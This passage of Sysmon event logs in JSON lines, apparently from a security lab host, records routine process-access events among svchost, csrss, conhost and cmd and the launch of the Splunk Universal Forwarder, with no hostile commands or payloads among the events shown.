{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00107A600300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00107A600300}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.736\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-00107A600300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3844\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010E45F0300}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.736","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-00107A600300}","SourceProcessId":"3824","SourceThreadId":"3844","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010E45F0300}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.754\r\nProcessGuid: {41C8662E-1F74-5F25-0000-0010B9610300}\r\nProcessId: 3860\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-0010E45F0300}\r\nParentProcessId: 3816\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.754","ProcessGuid":"{41C8662E-1F74-5F25-0000-0010B9610300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-0010E45F0300}","ParentProcessId":"3816","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010E45F0300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3820\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B9610300}\r\nTargetProcessId: 3860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010E45F0300}","SourceProcessId":"3816","SourceThreadId":"3820","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B9610300}","TargetProcessId":"3860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B9610300}\r\nTargetProcessId: 3860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B9610300}","TargetProcessId":"3860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 